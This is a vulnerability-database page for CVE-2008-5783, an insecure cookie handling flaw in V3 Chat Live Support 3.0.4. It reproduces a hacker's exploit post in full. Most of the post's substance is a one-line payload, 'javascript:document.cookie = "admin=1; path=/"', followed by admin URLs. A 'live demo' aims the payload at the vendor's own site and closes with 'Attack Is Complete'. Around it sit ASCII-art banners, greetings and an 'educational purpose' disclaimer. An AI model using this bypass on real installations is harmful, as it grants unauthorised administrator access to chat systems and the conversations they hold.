|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | V3 Chat Live Support 3.0.4 Insecure Cookie Handling Vulnerability
|
SecurityAlert : 4843
CVE : CVE-2008-5783
CWE : CWE-287
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : No
Credit : Cyber-Zone
Published : 03.01.2009
Affected Software : | v3chat:v3_chat_live_support:3.0.4 |
 Advisory Content : ***************************************************************************
***************************************************************************
*****
[!]
[!]
[!] OOOO O
OOOOOOOOO
[!]
[!] O O O
O O
[!]
[!] O O
O
[!]
[!] O OOOO OOOO OOOOOO OOOO OOO
OO O OOOO OO OO OOOO
[!]
[!] O OOO OOO O O O O
OO O O O O OO O O
[!] OO
Proud To Be MoroCCaN
[!]
[!] OO
[!]
***************************************************************************
***************************************************************************
*****
+---- Bismi Allah
Irahmani ArraHim
----+
++-------------------------------------------------------------------------
---------------------------------------------------------------------------
----+
++ [ V3 Chat Live Support v3.0.4
Insecure Cookie Handling Vulnerability ]
++
+--------------------------------------------------------------------------
---------------------------------------------------------------------------
---++
: Author : Cyber-Zone ( Abdelkhalek)
: :
:
¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr
¦ ¦
¦
¦ Home : WwW.IQ-Ty.CoM
¦ ¦ MySQL
Version Is : ¦
¦ From : MoroCCo
¦ ¦
¦
¦ Script : http://v3chat.com
¦ ¦ ![
]! ¦
¦ Download : http://v3chat.com/live_support.php
¦ ¦
¦
¦ RisK : High
[¦¦¦¦¦¦¦¦]
¦
¦ ¦
¦
---------------------------------------------------------------------------
-----------------------------+
+-------------------------------------- ¦
¦ From The
Dark Side Of MoroCCo
++
+--------------------------------------------------------------------------
---------------------------------------------------------------------------
---++
:
:
¦ Remember :
¦
¦ -------------
¦
¦
¦
¦ This information is only for educational purpose, Cyber-Zone will
not bear responsibility for any damages.
¦
¦
¦
++-------------------------------------------------------------------------
---------------------------------------------------------------------------
----+
++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX
Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!]
++
+--------------------------------------------------------------------------
---------------------------------------------------------------------------
---++
hato had code f URL :
javascript:document.cookie = "admin=1; path=/";
Live demo :
javascript:document.cookie = "admin=1;
path=/v3livesupport-v304/admin/index.php; domain=v3chat.commain.php";
http://v3chat.com/v3livesupport-v304/admin/index.php
3awdo wtaw f enter f had Url :
http://v3chat.com/v3livesupport-v304/admin/messages.php
Please wait, logging you in... :)
+--------------------------------------------------------------------------
---------------------------------------------------------------------------
---++
+----
ThanX To
----+
++-------------------------------------------------------------------------
---------------------------------------------------------------------------
----+
++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr
, $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig
City ]++
+--------------------------------------------------------------------------
---------------------------------------------------------------------------
---++
=
[AttaCk Is CompLet]
=
___________________________________________________________________________
___________________________________________________________________________
_____
References :
http://securityreason.com/expldownload/1/5093/1 (Exploit)
http://www.securityfocus.com/bid/32216
http://www.milw0rm.com/exploits/7069
http://www.frsirt.com/english/advisories/2008/3066
http://secunia.com/advisories/32603
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|